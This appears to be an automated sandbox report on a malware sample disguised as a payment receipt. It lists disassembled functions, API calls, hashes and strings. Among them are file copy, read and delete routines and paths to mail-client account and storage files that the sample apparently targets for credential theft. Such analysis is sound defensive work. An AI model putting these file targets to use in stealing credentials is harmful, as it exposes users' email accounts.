                                                    control_flow_graph 360 10009492-100094ef GetConsoleCP 361 10009632-10009644 call 10002ada 360->361 362 100094f5-10009511 360->362 364 10009513-1000952a 362->364 365 1000952c-1000953d call 10007c19 362->365 367 10009566-10009575 call 100079e6 364->367 372 10009563-10009565 365->372 373 1000953f-10009542 365->373 367->361 374 1000957b-1000959b WideCharToMultiByte 367->374 372->367 375 10009548-1000955a call 100079e6 373->375 376 10009609-10009628 373->376 374->361 377 100095a1-100095b7 WriteFile 374->377 375->361 382 10009560-10009561 375->382 376->361 379 100095b9-100095ca 377->379 380 1000962a-10009630 GetLastError 377->380 379->361 383 100095cc-100095d0 379->383 380->361 382->374 384 100095d2-100095f0 WriteFile 383->384 385 100095fe-10009601 383->385 384->380 386 100095f2-100095f6 384->386 385->362 387 10009607 385->387 386->361 388 100095f8-100095fb 386->388 387->361 388->385
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                    • __fassign.LIBCMT ref: 1000954F
                                                    • __fassign.LIBCMT ref: 1000956A
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                    • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                    • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID: *O"/
                                                    • API String ID: 1324828854-463055101
                                                    • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                    • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                    • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                    • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                    Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                    • String ID:
                                                    • API String ID: 1454806937-0
                                                    • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                    • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                    • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                    • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                    Function 10008821 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 406 10008821-1000883a 407 10008850-10008855 406->407 408 1000883c-1000884c call 10009341 406->408 409 10008862-10008886 MultiByteToWideChar 407->409 410 10008857-1000885f 407->410 408->407 418 1000884e 408->418 412 10008a19-10008a2c call 10002ada 409->412 413 1000888c-10008898 409->413 410->409 415 1000889a-100088ab 413->415 416 100088ec 413->416 419 100088ca-100088db call 100056d0 415->419 420 100088ad-100088bc call 1000bf20 415->420 422 100088ee-100088f0 416->422 418->407 424 10008a0e 419->424 434 100088e1 419->434 420->424 433 100088c2-100088c8 420->433 423 100088f6-10008909 MultiByteToWideChar 422->423 422->424 423->424 427 1000890f-1000892a call 10005f19 423->427 428 10008a10-10008a17 call 10008801 424->428 427->424 438 10008930-10008937 427->438 428->412 437 100088e7-100088ea 433->437 434->437 437->422 439 10008971-1000897d 438->439 440 10008939-1000893e 438->440 442 100089c9 439->442 443 1000897f-10008990 439->443 440->428 441 10008944-10008946 440->441 441->424 444 1000894c-10008966 call 10005f19 441->444 445 100089cb-100089cd 442->445 446 10008992-100089a1 call 1000bf20 443->446 447 100089ab-100089bc call 100056d0 443->447 444->428 461 1000896c 444->461 450 10008a07-10008a0d call 10008801 445->450 451 100089cf-100089e8 call 10005f19 445->451 446->450 459 100089a3-100089a9 446->459 447->450 460 100089be 447->460 450->424 451->450 464 100089ea-100089f1 451->464 463 100089c4-100089c7 459->463 460->463 461->424 463->445 465 100089f3-100089f4 464->465 466 10008a2d-10008a33 464->466 467 100089f5-10008a05 WideCharToMultiByte 465->467 466->467 467->450 468 10008a35-10008a3c call 10008801 467->468 468->428
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                    • __freea.LIBCMT ref: 10008A08
                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                    • __freea.LIBCMT ref: 10008A11
                                                    • __freea.LIBCMT ref: 10008A36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID: *O"/
                                                    • API String ID: 1414292761-463055101
                                                    • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                    • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                    • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                    • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                    Function 10003370 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 471 10003370-100033b5 call 10003330 call 100037a7 476 10003416-10003419 471->476 477 100033b7-100033c9 471->477 478 10003439-10003442 476->478 479 1000341b-10003428 call 10003790 476->479 477->478 480 100033cb 477->480 483 1000342d-10003436 call 10003330 479->483 482 100033d0-100033e7 480->482 484 100033e9-100033f7 call 10003740 482->484 485 100033fd 482->485 483->478 493 100033f9 484->493 494 1000340d-10003414 484->494 486 10003400-10003405 485->486 486->482 489 10003407-10003409 486->489 489->478 492 1000340b 489->492 492->483 495 10003443-1000344c 493->495 496 100033fb 493->496 494->483 497 10003486-10003496 call 10003774 495->497 498 1000344e-10003455 495->498 496->486 504 10003498-100034a7 call 10003790 497->504 505 100034aa-100034c6 call 10003330 call 10003758 497->505 498->497 500 10003457-10003466 call 1000bbe0 498->500 506 10003483 500->506 507 10003468-10003480 500->507 504->505 506->497 507->506
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                    • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                    • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: *O"/$csm
                                                    • API String ID: 1170836740-2149301626
                                                    • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                    • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                    • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                    • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                    Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                    • _free.LIBCMT ref: 100092AB
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 100092B6
                                                    • _free.LIBCMT ref: 100092C1
                                                    • _free.LIBCMT ref: 10009315
                                                    • _free.LIBCMT ref: 10009320
                                                    • _free.LIBCMT ref: 1000932B
                                                    • _free.LIBCMT ref: 10009336
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                    • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                    • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                    Function 10004B39 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: *O"/$CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-915810377
                                                    • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                    • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                    • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                    • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                    Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _strlen.LIBCMT ref: 10001607
                                                    • _strcat.LIBCMT ref: 1000161D
                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                    • String ID:
                                                    • API String ID: 1922816806-0
                                                    • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                    • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                    • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                    • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                    Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                    • String ID:
                                                    • API String ID: 3594823470-0
                                                    • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                    • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                    • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                    • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                    Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                    • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                    • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                    • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                    • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                    Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                    • _free.LIBCMT ref: 10005B2D
                                                    • _free.LIBCMT ref: 10005B55
                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                    • _abort.LIBCMT ref: 10005B74
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                    • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                    • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                    • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                    Function 100086E4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                    • __freea.LIBCMT ref: 100087D5
                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID: *O"/
                                                    • API String ID: 2652629310-463055101
                                                    • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                    • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                    • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                    • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                    Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                    • API String ID: 4036392271-1520055953
                                                    • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                    • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                    • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                    • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                    Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                    • _free.LIBCMT ref: 100071B8
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                    • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                    • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                    • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                    Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                    • _free.LIBCMT ref: 10005BB4
                                                    • _free.LIBCMT ref: 10005BDB
                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                    • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                    • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                    • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                    Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                    • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
